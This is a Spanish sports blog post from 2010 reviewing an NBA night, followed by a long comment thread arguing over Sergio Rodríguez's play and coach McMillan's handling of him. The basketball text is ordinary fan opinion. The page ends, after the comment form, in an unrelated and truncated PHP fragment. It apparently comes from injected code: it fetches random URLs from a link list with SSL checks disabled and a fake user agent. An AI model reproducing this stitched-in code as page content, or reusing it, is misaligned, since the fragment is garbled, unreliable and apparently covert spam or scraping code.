La Crónica (22/02/2010)

23 de February de 2010 por TheDeerHunter

Jornada de transición. 5 partidos bastante desangelados por unos u otros motivos.

El más parejo y competitivo, a priori, perdía a Deron Williams y Kirilenko como reclamo. Aún así los CJ Miles, Ronnie Price, Wesley Matthews, Fesenko y Sundiata Gaines mostraron mimbres anónimos poniéndoselo difícil a todo un contendiente como los Hawks. Por su parte los mejores los de siempre, Josh Smith, Joe Johnson o Jamal Crawford que le dan la dinamita a este equipo.

Por orden clasificatorio hablaríamos ahora de Dallas. Partido malo de consideración el que le ganaron a los Pacers. Ninguno de los dos equipos llegaron al 40% el tiro y el mejor fue Haywood en plan “Carpanta” recogiendo 20 rebotes y anotando 13 puntitos. Él es el verdadero fichaje estrella de estos Mavs, dándole a sus compañeros lo que nunca ha sido capaz de darles Dampier. Complemento ideal para un equipo que necesitaba específicamente eso.

Por la parte que más nos toca, partido descerebrado de Sergio como titular en uno de los equipos más descerebrados. El Caos se ilustra con 8 robos suyos por una sóla asistencia y una selección de tiro lamentable, como mandan los cánones en New York. Que no se engañe Sergio  porque si se contagia de esa locura tan sólo será un efímero expiring en la gran Manzana. 10 asistencias-14 pérdidas para el global del equipo. 67 exiguos puntos que dan vergüenza. Los Bucks comandados por un Bogut gigantesco no tuvieron ni para empezar. Diría que ni a los Nets les hubieran puesto en problemas anoche.

En Washington hay buenas caras con Blatche y Al Thorton. Malas para unos Bulls que van para abajo porque lo han elegido ellos. También buena cara en los Clippers, muy sólidos anoche contra unos desorientados Bobcats.

PREMIOS

MVP: 24 puntos (12 de 15), 20 rebotes y 5 tapones. No parecen números de Andrew Bogut pero prometemos que son suyos. 20 rebotes recogió también Brendan Haywood aderezados con 13 puntos y 3 tapones. El ex de Washington supone un gran mejora sobre Eric Dampier. Joe Johnson también cuajó una gran actuación con 28 puntos, 6 rebotes y 6 asistencias.

Rookie: Los porcentajes de acierto de Brandon Jennings siguen por los suelos y es por eso, y a pesar de los 8 rebotes y 7 asistencias, que el premio se lo llevan los 9 puntos y 8 rebotes de Taj Gibson.

Sorpresa: Ya lleva unos partidos la mar de correctos. Anoche, Mbah-a-Moute se fue a los 11 puntos, 11 rebotes, 4 asistencias con unos aciertos en el tiro brutales. Sergio Rodríguez repartió 1 sola asistencias pero robó 8 balones. ¿El mundo al revés?

Decepción: ¡Qué poquito ha durado la alegria en New York! Después de un buen primer partido de T-Mac y compañía, anoche se quedaron en 67 tristes puntos.

Esfuerzo en vano: Gerald Wallace no se perdió ni un segundo en la derrota de los Bobcats frente los Clippers. Y en 48 minutos anotó 32 puntos, recogió 12 rebotes, repartió 5 asistencias y robó 4 balones. Una actuación completísima.

Comenta

34 comentarios a esta entrada

  1. M dice:
    #1

    Nueva York ha tirado esta temporada, como las anteriores, así que supongo que la tarea de Sergio y compañeros debe ser ganarse la posibilidad de que piensen en ellos el próximo año, si se hacen con una superestrella…cosas que dudo…

      Citar

  2. kantonyo dice:
    #2

    Q no nos engañen las estadísticas. Sergio ayer no jugó del todo bien, no voy a defender su rendimiento. Pero pudo hacer 6-8 asistencias fácilmente si sus compañeros hubieran estado un poco inspirados. Secó y anulo totalmente el juego de Jennings con su presión, provocando los ocho robos (se notó la mano McMillan jajaja). Y lo mejor para mí de su actuación fue al inicio de la segunda parte donde infringió un ritmo de partido tremendo, volviendo loco a los Bucks y provocando un 12-0, hasta que le cortaron sus propios compañeros.

    Espero mucho más de él, pero no creo que hiciera un mal partido, creo que fue el mejor de los Knicks. Aunque claro esto no es ningún merito.

      Citar

  3. pcerezo dice:
    #3

    Pues Sergio debe esperar a lo que suceda el 1 de julio, porque en ese momento conoceremos el proyecto Knicks. Una incógnita total y abosluta. Creo que McGrady está para poder jugar en los actuales Rockets sin problemas pero Adelman ha preferido otras cosas…

    Por otra parte Haywood va a darles la energía que no ha dado Dampier pero creo que el salto de calidad no es tan grande como para luchar con Lakers y por debajo con Utah o Denver. No sé como lo veréis?

      Citar

  4. Hynreck dice:
    #4

    Creo que la decepcion hoy deberia ser para el partido de Stephen Jackson y su 1 de 16 en tiros de campo
    Wilmaaaa!!!!

      Citar

  5. TheDeerHunter dice:
    #5

    No sé, Kantonyo… supongo que será como dices. Pero el asunto es que tiró mucho y mal y por ahí poco tienen que ver sus compañeros. También me extraña que para haber sido el mejor del equipo el parcial con él en cancha fue el más sangrante…
    Desde luego que espero más de él… que no se crea que ha llegado allí para ser el Nash de los Knicks con ese juego sin sentido que tienen ahora. Su valor sigue siendo expiring mientras no se demuestre lo contrario… y yo deseo que lo demuestre, no volviéndose loco con todos los cantos de sirena de que es el base ideal para aquel despropósito. Si ese es su verdadero perfil lo lleva claro.

    Y lo de McMallon me llega al alma. En Portland tuvo una etiqueta desde el principio y hasta el final… y daba igual lo que él hiciera. Es más, cuanto más hacía lo que le pedía el entrenador menos jugaba. Nunca sabremos lo que aprendió defensivamente de todo aquello, sencillamente porque allí jamás hubieramos visto 8 robos, porque a la primera de sus pérdidas o de sus fallos en el tiro hubiera vuelto de cabeza al banquillo. A ver si va a ser mérito de McMallon que Sergio resulte ser un buen defensor y él jamás lo viera.

      Citar

  6. TheDeerHunter dice:
    #6

    Todo depende del rendimiento de Butler para evaluar eso, PCerezo… pero entre lo que le da Haywood a estos Mavs y lo que le daba Josh Howard creo que esteremos todos de acuerdo conque no hay color.

      Citar

  7. kantonyo dice:
    #7

    Lo de McMillan lo he dicho ironicamente. Pienso que aunque en el caso hipotético de que hubiera aprendido a ser un buen defensor, creo que McMillan acabó con el desparpajo y creatividad de Sergio, le mató deportivamente.

    No estuvo acertado en el tiro, pero si fueron buenas selecciones de tiro, simplemente no acertó.

    Tienes razón en cuanto a números, pero no fue la sensación que me dejó a mi en el partido ni en el desarrollo del juego. Al igual que vi un partido desastroso de David Lee, y en cambio los números no le dejan tan mal. Por eso decia que las estadisticas mienten en este caso, a mi me dejó buenas sensaciones.

    Vamos a ver que sensaciones le dejó a D’Antoni, que es lo que importa. Hoy díficil papeleta contra Boston en el Garden.

      Citar

  8. sayim dice:
    #8

    no es mal momento para visitar el garden. Aunque para estos knicks puede ser malo cualquier momento para visitar cualquier cancha

      Citar

  9. Txusma dice:
    #9

    Pues yo creo que la mejora entre Haywood y Dampier es mucho mayor que entre Butler y Josh Howard… Así que considero realmente clave la adquisición del pívot.

      Citar

  10. arivas dice:
    #10

    Yo creo que la primera lectura del caso de Sergio es que ahora al menos tiene opciones de demostrar su nivel. Igual termina por un mal camino como apunta Deer, pero creo que es pronto aun para hacer esa evaluacion. Es cierto que la dinamica del equipo le puede hacer caer en errores, pero la oportunidad está ahí, y yo soy de los que creo que puede aprovecharla.

      Citar

  11. TheDeerHunter dice:
    #11

    Creo que esto último es lo que puede ser la clave… con todo, es mejor su situación ahora en cuanto a que al menos tiene la posibilidad de mostrarse que la de hace un mes, donde había 3 tíos por delante de él, o la de Portland, donde tenía a McMillan amargándole la vida.

      Citar

  12. pcerezo dice:
    #12

    Yo estoy con Txumsa, que la clave de mejora es Haywood, porque Butler y Howard son jugadores parecidos y por ahi no creo que haya mejora grande. Lo que sí digo es que el salto no es tan grande como para pensar en final NBA o incluso final conferencia.
    Hay que tener en cuenta que para mí hay dos equipos que son mejores Lakers, Denver y tres muy parecios de nivel Utah, Dallas y Spurs por debajo.

      Citar

  13. Love Denise dice:
    #13

    mcmillan no estaría ni entre mis 20 coach favoritos de la NBA, pero para nada hay que echarle la culpa a Mcmillan de que mató la creatividad de Sergio…, si éste no triunfó ni en Portland, ni en Sacramento, y ahora en Knicks, en un equipo con el listón bajísimo, sin mucha presión y dónde sólo puede hacerlo bien porque el estilo de juego le favorece, por el momento sólo ha sido capaz de hacer dos partidos bastante grises.

      Citar

  14. sayim dice:
    #14

    Si Love Denise, dos partidos bastante grises, pero no creo q sea suficiente para juzgarle de momento. A mi tampoco me extrañaria que promediara en estos 30 partidos cerca de un doble-doble, si no es asi vuelta a Europa y ni siquiera creo q a un equipo de primer nivel

      Citar

  15. Love Denise dice:
    #15

    por supuesto que a Sergio le quedarán algunos partidos buenos, cualquier jugador normalito hace en su vida unos 5 partidos maravillosos. Si hasta el mediocre Duhon ha hecho algunos partidazos con los Knicks. Por cierto, si sergio hiciese un 10pt-10asist, en lo que queda de campaña, tampoco sería como para alabarlo, venerarlo y besarle los pies, estaría bien, pero con este estilo de juego, las estadísticas se engordan bastante y pueden ser engañosas.
    Hay gente que dice que Sergio no ha tenido suerte en la NBA, no le han dejado jugar, etcétera…, yo opino al revés, creo que ha tenido una suerte tremenda de jugar en la NBA (bases más buenos 1000 veces se han quedado en Europa, y no le han dado la oportunidad de cruzar el charco), y encima ha tenido la fortuna de jugar 12 minutillos gracias a que jugaba en horribles equipos y sus compañeros (los bases) eran casi igual de malos que él.
    Competencia en Portland: Steve Blake (sería 2ºbase en cualquier otro equipo), Jarret Jack (más un “2” que un base), y Bayless (jugador joven, con potencial pero verde)
    competencia en Kings: Udrih (base normalito), Evans (rookie que ha jugado de “2” por las lesiones de los Kings.
    competencia en New York: Duhon (mediocre), Toney Douglas (rookie muy verde)

    y aun así sólo ha sido capaz de arañar 13 minutos en su carrera

      Citar

  16. sayim dice:
    #16

    Estoy de acuerdo que hay bases mejores que el que nunca llegaron a la NBA, pero Sergio siempre tuvo claro que queria jugar alli y cogio el toro por los cuernos: Se fue para alla un verano a hacer entrenamientos privados e intentar convencer a algun GM, como finalmente hizo. No digo que sea el mejor base del mundo, pero creo que puede tener sitio en la NBA, porque hace cosas diferentes a los demas. Ademas es un tío que me cae bien por su humildad y desparpajo. Y que quieres que te diga entre Duhon (al que nombras tu) y Sergio, yo creo q el segundo de ellos lleva mas gente a verle jugar…

      Citar

  17. Viva_Dirk dice:
    #17

    A los Mavs a parte de las adquisiciones les hará falta un patrón de juego para llegar a cotas altas. El partido de ayer fue horrible.

    En la discusión de Sergio no voy a entrar mucho, pero soy 100% contrario a la opinión de Denise.

      Citar

  18. TheDeerHunter dice:
    #18

    Nuestro amigo Love Denise pasa por alto algunos datos, como el hecho de que Sergio Rodríguez es campeón del mundo, con alguna que otra actuación brillante si mal no recuerdo, y también campeón de europa juvenil en el que fue el puto amo de la galaxia y no exagero un ápice. Directamente las franquicias nba se daban de ostias por cazarle como valor joven, así que de suerte por la parte que le corresponde NINGUNA. Lo más normal del mundo. Aunque estoy de acuerdo con que de desgraciado tiene muy poco, eso sí.

    En el plano deportivo, pues efectivamente la cerrilidad de algunos han impedido triunfar en esta liga a gente como Jasikevicius o Djordjevic por poner un par de ejemplos notorios. Y no hace mucho también ha dejado en el dique seco a algún ilustre todavía mayor… yo no voy a comparar ahora mismo a Sergio con ellos, por supuesto. Lo que quiero decir es que en esta liga 2+2 a veces no es igual a 4.

    En el análisis que haces de su competencia, por supuesto que no voy a entrar en el caso de los Knicks, donde Sergio lleva tan sólo 2 partidos y ya es titular y el base con más minutos (con resultados algo grises, cierto)
    En Portland podrás hablar de Blake, Jack, Bayless o de quien quieras. El caso de Sergio tampoco es único allí. El trato a André Miller, al propio Blake ahora, a Rudy, a Outlaw, a Webster o Batum… son casos que rozan el trastorno bipolar y para mí son el claro modelo de cómo no llevar a un grupo deportivo. Dando bandazos de aquí para allá y volviendo a los jugadores completamente majaras. Demasiado hizo Sergio en no estallar y comportarse como un auténtico profesional que es lo que él es.

    Y en Sacramento, efectivamente su progresión se la ha cortado Evans que inicialmente se pensaba iba a jugar de 2. Con Martin le reuvicaron de uno con absoluto éxito… y Udrih no ha jugado en toda la temporada como jugador mediocre. Más bien al contrario.
    Con todo, no sé qué se le puede achacar a Sergio en Sacramento porque cuando ha tenido oportunidades lo ha hecho perfecto. De hecho la mejor racha del equipo coincide con su mayor aportación de minutos. ¿Qué culpa tiene Sergio de que el equipo estuviera mal parido?? ¿También se la echamos a él?? Anda ya.

    Tengo claro una cosa. Que en la liga siguen habiendo montones de bases que tendrán que nacer 14 veces para llegar a donde ha llegado Sergio con poco más de 20 años… y no digo nada para tener su talento. No digo que necesariamente tenga que ser una estrella de la liga pero le sobra categoría para permanecer en ella. Es un problema de vista… como digo no es la primera vez que los visionarios NBA la cagan completamente. Ni será la última. Ejemplos hay a patadas.

      Citar

  19. kantonyo dice:
    #19

    McMillan hizo con Sergio, como si hubiera sido un patrón de obra y hubiera tenido a Sorolla poniendo ladrillos. Repito lo dicho, lo mató deportivamente hablando. Al igual que está haciendo con Rudy. Pueden ser mejores o peores, pero no son ellos, como los conociamos antes de dar el salto a la NBA.

    Estos primeros partidos no deberían ser para juzgarlo tan drasticamente sino para ver sensaciones, y para ver como puede encajar en el proyecto de D’Antoni. No estoy hablando de que Sergio vaya a ser un Kidd, Nash o Paul, sino de que sea válido para jugar en la NBA varios años a un nivel medio.

      Citar

  20. Love Denise dice:
    #20

    Pero qué ha hecho Sergio Rodriguez??????? Ganar el Mundial’06 gracias a Pau, Navarro, Garbajosa, calde, rudy,Marc , etc…, . pero ¡¡¡¡¡¡si era el jugador nº12¡¡¡¡¡. El gran sergio Rodriguez sigue viviendo de los dos triples y un par de asistencias que hizo vs Argentina en semis, y del mundial junior donde jugaba con gente de su edad, y en un equipo que pese a ser campeón, no había muchos buenos jugadores. es un fraude, vive de dos actuaciones¡¡¡, como Dejuan Wagner y sus 100 puntos en un partido, Cabarkapa y un par de partidos buenos que se marcó en la NBA a parte de ser un buen junior, y otros tantos casos como ese.

    Obviamente puede estar en la NBA, hoy en día cualquier jugador que haga 2 partidos buenos, y tenga a la prensa detrás poniendolo como el nuevo Nash o Maravich juega en la NBA. pero una cosa es jugar en la NBA y tener protagonismo como lo hace, ya no te voy a decir Nash, o alguno de los grandes, sino como Ridnour, Blake, Earl watson, etcétera, y otra cosa es estar allí para estar agitando toallas sin protagonismo alguno.
    Lo dicho, qué suerte tiene el Chacho de haber caído en el vertedero actual que son los Knicks, y de haber pasado por tan malos equipos, con tan poca competencia.
    Y si fuera entrenador, sin ver las cosas como la vemos los aficionados, prefiero a un base que tenga tiro, defienda, no pierda balones a uno que sale para dar un pase por la espalda o alguna filigrana que le sale bien una de cada cuatro, para eso ya están los Globetrotters. Por último, decir que en los actuales Knicks, cualquier base medio decente se marcaría un doble-doble con la gorra.

      Citar

  21. Love Denise dice:
    #21

    Y referente un poco este tema. No creeis que el nivel medio de la NBA ha bajado mucho en estos últimos años? Hace 10 años, europeos o formados en Europa como Vujacic, Turiaf, Sergio, Petro, Ibaka, dragic, Ukic… no hubieran jugado en la NBA ni en broma.

      Citar

  22. Viva_Dirk dice:
    #22

    No es que el nivel halla bajado, es que hay mas equipos y por lo tanto mas huecos que llenar. Y que cada vez se forman menos jugadores en la NCAA.

    Respecto a que ha hecho Sergio Rodriguez, ¿que ha hecho Steve Blake?¿que habia hecho Lebron antes de llegar a la NBA? Sergio no fue drafteado por lo que habia hecho, que también, sino por lo que podia hacer en el futuro, y entonces llegó McMillan para volverlo loco.

    Y sin el no habriamos sido campeones del mundo, sin sus 14 puntos con 3 triples sin fallo no habriamos ganado a Argentina.

      Citar

  23. sergio dice:
    #23

    Recordemos que Sergio tiene 20 años… y no creo que este lejos de Duhon para jugar en los Knicks. Desde luego no me parece un base para la NBA, siendo la posicion con mas categoria de toda la competicion, pero si me parece que tiene bastante potencial y que se adapta perfectamente al juego del equipo. Pero seamos sinceros y objetivos… si no es capaz de demostrar lo que puede hacer en este equipo que se venga a Europa y disfrute del baloncesto. No se puede vivir de ser una eterna promesa… ni siquiera de ser un “jugon”. Que cumpla y si no que deje hueco a los que vienen detras.

    Aparte de eso, me parece incomparable el Haywood-Dampier con el Butler-Howard, principalmente porque yo a Butler lo compararia con Terry… sobre todo por fisico y estilo de juego. Y por supuesto que Haywood aporta mas.. es que lo de Dampier era todo un cáncer para el equipo.

      Citar

  24. TheDeerHunter dice:
    #24

    Sí hombre, LDenise… cualquier base medio decente puede hacer un doble doble en estos Knicks, ya lo hemos visto con todos los bases que han pasado por el equipo.

    Efectivamente, Sergio ganó un mundial gracias a Pau, Navarro… y lo que quieras más un partidazo increíble contra Argentina. Y el Europeo junior o su última liga ACB no fueron dos partidos… bastante más de lo que habían demostrado Parker, Billups, Nash o Paul antes de llegar a la NBA.

    Si minusvaloramos sus méritos y hacemos sangre con sus deméritos propios más los ajenos es normal que te parezca un jugador mediocre. Por la misma regla de tres ahora te deberán parecer mediocres los Rudy Fernández, Nicolas Batum, Webster o Bayless, que están sufriendo en sus carnes los peores castigos que sufrió Sergio. En el caso de estos más flagrante… porque McMillan no puede dar como excusa que son malos defensores (que no se lo cree ni él) Lo que está pasando con Webster… que le ha estado sacando las castañas del fuego todo el último mes es directamente para mandar al paredón al puñetero McMallon.

    Te lo creerás o no, pero ese argumento de minusvalorar méritos ya me lo dieron algunos hablando de Pau en su día.

      Citar

  25. love denise dice:
    #25

    me reafirmo, cualquier base medio decente hace un doble-doble en este vertedero llamado Knicks, lo que pasa es que Duhon es igual de medianía que Sergio. Hoy, sergio hizo un 18-6, pero el partido desde el punto de vista táctico y estratégico fue un absoluto desproposito, un correcalles, baloncesto sin control, y así es fácil engordar las estadísticas.
    Ahora resulta que el partido vs Argentina lo ganó Sergió él sólo. Yo creo que otros jugadores contribuyeron más al triunfo que él, y si nos atenemos a los instantes finales, el partido se ganó gracias al fallo de Nocioni, si este mete el triple, hubieramos quedado cuartos.

    Lanzo una pregunta, si Sergio fuese americano, lo defenderías igual? Yo creo que pasaría desapercibido por el blog (tanto para sus defensores como sus detractores) tal y como él lleva 4 años.

      Citar

  26. love denise dice:
    #26

    ¿por qué culpais a Mcmillan del bajo rendimiento de Sergio? Wesphal tampoco sabe de basket? Aito o Scariolo que no lo han llevado a la selección tampoco? A veces hay que mirarse en uno mismo, y no echarle la culpa a los demás.

      Citar

  27. TheDeerHunter dice:
    #27

    ¿correcalles? lógicamente los Knicks tienen que utilizar su estilo, que es el de D’Antoni… pero anoche únicamente anotaron 4 puntos de contragolpe, 40 en la pintura, porcentajes de tiro altísimos. Narices, que estuvieron a punto de tocarle bien la cara a los Celtics en el Garden. Lo miras desde un prisma asombrosamente negativo. Sergio hace mejor a este equipo y ahora te tocará valorarlo.

    Si Sergio fuera un jugador desconocido, por supuesto que no nos fijaríamos tanto. Es pura lógica. Le conocemos y por eso sabemos de lo que es capaz, y por eso nos llama más la atención que otros casos. Pero es que el baloncesto también tiene un componente de emotividad… y para algunos el Chacho es más que un simple jugador anónimo.

    Pero es que lo de McMillan, como te digo, es una evaluación objetiva sobre cuestiones de coherencia. Westphal siempre ha sido claro conque Udrih y Tyreke estaban por delante de la rotación que Sergio. A mí eso me parece respetable… y tampoco me parece una humillación porque tengo un gran concepto de ambos jugadores. Yo no digo que Sergio sea necesariamente mejor que ellos.
    Lo mismo puedo decirte con respecto a Ricky, Cabezas o Raul… todos me parecen muy buenos y lo han demostrado. Entiendo porqué Sergio no ha ido en tales circunstancias.

    Pero McMillan, por poner un ejemplo claro, mareó a Sergio lo que no está escrito. (A Sergio y a quien no es Sergio, que lo vemos todos los días) Le castigaba por cualquier error de una manera desproporcionada, pasaba de jugar minutadas contando como primer o segundo base a jugar apenas un par de minutos de la noche a la mañana. Un día contaba, otro día no contaba, al siguiente contaba, otrora no… puff me recuerda al sketch del wifi de Enjuto Mojamuto… jjj
    Parecía empeñado en minar la autoconfianza del chaval en todas y cada una de las decisiones que tomó… uno que tiene algunas nociones sobre formación de valores jovenes, todo eso está completamente contraindicado. Estoy convencido de que Sergio fue utilizado como arma arrojadiza entre el técnico y el GM, porque si no no se explica tantísima crueldad.

    Pero es que, como digo, el problema de McMillan no es sólo Sergio. Es que es un entrenador barraquero como él sólo y su baloncesto me da GRIMA. Su personalidad más grima todavía. Un tipo completamente despreciable bajo mi punto de vista.

      Citar

  28. TheDeerHunter dice:
    #28

    Mira por donde… comentario de hoy de Rudy, según Marca:
    “McMillan es un entrenador que tiene las cosas muy claras, que va a muerte con su filosofía y muchas veces yo no entro en ella. Yo intento amoldarme a lo que él dice y jugar como él quiere, pero no noto esa confianza que en el primer año tenía”, desvela. También ha sido “muy complicado” el año para su equipo debido a las “lesiones” y, sobre todo muy seguidas, aunque el “objetivo es entrar en play-off”.

    leamos entre líneas…
    lanzo yo pregunta: ¿Rudy también es un jugador mediocre, Love Denise?

      Citar

  29. TheDeerHunter dice:
    #29

    Y casualidad, otro comentario más, que parece que le hace el mismo Daimiel a Love Denise:
    http://blogs.plus.es/daimiel/2010/02/afecto-y-oficio.html

      Citar

  30. kantonyo dice:
    #30

    LoveDenise, No entiendo porque metes en el mismo saco a Petro, Turiaf y Vujacic con Ibaka, Dragic y Sergio.

    El esloveno en su segundo año, con 23 años está promediando 8 puntos en 17 minutos teniendo por delante a Steve Nash. No creo que sea para catalogarle como malo, ni ponerle en el grupo de los cojos. Yo creo que está respondiendo bastante bien a lo que se espera de él. Tiene un 40% en tiros de 3p y cuando no ha jugado Steve como ayer, lo ha hecho bastante bien, 16 puntos 10 asistencias. y no hace mucho 32 puntos contra Utah.

    Lo de Serge Ibaka, perdona que me sorprenda, porque este jugador para mi promete muchisimo, posiblemente estemos ante uno de los jugadores más prometedores del mundo, no sólo internacionales. Tiene 19 años, y en su primer año está promediando 5 puntos y 5 rebotes en 16 minutos. Y para nada son minutos de la basura. Tiene unas cualidades físicas impresionantes, aunque debe mejorar en tiro de media distancia y sobre todo tecnicamente.

    Y lo de Sergio, pues mis sensaciones contra Bucks parece que no eran erroneas. Ayer hizo un gran partido en el Garden, con todo lo que se jugaba, y pudo hacerlo mejor si tuviera más confianza, pudo jugarse más tiros.

    Mientras Sergio hacia 18 puntos con NYK y era declarado mejor jugador extranjero de la jornada, Rudy se volvia a comer los mocos en Portland. Según el tebeo Marca, el Real Madrid está detras del balear.

    Por último, llevo unos meses siguiendo a Jan Vesely en la Euroliga, ala-pívot checo. Va a ser elegido posiblemente entre los 15 primeros del draft. El año pasado no estaba de acuerdo cuando se decia que el draft del 09 era malo, pero este año si que no veo nada del otro mundo, quitando a John Wall y poco más. Jugadores muy poco preparados la mayoria. Yo creo que el checo debería ser top5 como mínimo. Veremos como progresa.

      Citar

  31. Love Denise dice:
    #31

    vayamos por partes, nadie sabe que puede deparar el futuro, y si Sergio se convierte en un buen base, seré el primero en rectificar, pero hasta el momento, Año IV d.S (después de Sergio), no ha demostrado absolutamente nada en la mejor liga del mundo, y pocas cosas en Europa, sólo algunas jugadas bonitas de vez en cuando. El baloncesto es algo más que una jugada de top 10.
    Deer me pregunta sobre Rudy: Ni comparar al mallorquçin con el canario, Rudy es un crack, ha dominado y ha hecho lo que ha querido en la ACB, en Europa, con la Selección, e hizo un grandísimo primer año. Ahora mismo no está en un buen momento de forma, pero todos los jugadores pasan alguna vez por un bache de juego, lo que le está faltando este año es hacer cosas distintas, mostrar recursos, ya que juega 20 minutos y sólo tira triples, este año le falta un poco de valentía y desparpajo.
    Sobre el tema Mcmillan, no es santo de mi devoción, pero creo que no hay que echarle la culpa de que se ha cargado a Rudy y Sergio. Él es el primer interesado en buscar lo mejor para el equipo, y pone a los que estén mejor cada momento, nada que ver con que le tiene manía a los españoles, como se ha dicho en algunos periódicos o foros.
    deer, daimiel sabe de baloncesto más que yo, pero lo que diga tampoco es la verdad absoluta y suprema, y más cuando se trata de opinar sobre un jugador, algo que siempre es subjetivo (excepto casos como Jordan, Kobe,…), además su opinión (a diferencia de la mía y de la tuya) a lo mejor puede verse influida por el hecho de que lo conozca y sea su amigo, y por tanto no lo va a criticar.
    a kantonyo. no he dicho que Sergio, Ibaka o dragic sean malos a reventar, lo que quiero decir es que hace 15 años no hubieran jugado en la NBA ni de coña, pero ahora el listón para jugar en la NBA es realmente bajo, y a cualquier jugador con estadísticas normalitas en el Manresa o en el Estudiantes le dan una oportunidad para cruzar el charco. Hace 15, por regla general, había que ser un crack, para jugar en la NBA y con un rol, en la mayoría de las ocasiones, secundario.

      Citar

  32. Love Denise dice:
    #32

    he hecho un comentario sobre sergio pero de momento no aparece, me pone en letra roja “Tu comentario está esperando moderación”. No se a que se debe.

      Citar

  33. Txusma dice:
    #33

    Como has escrito el nick de un modo diferente, el sistema te ha detectado como un usuario nuevo y el primer mensaje de un usuario nuevo siempre es moderado.

      Citar

  34. Love Denise dice:
    #34

    ok, txus

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>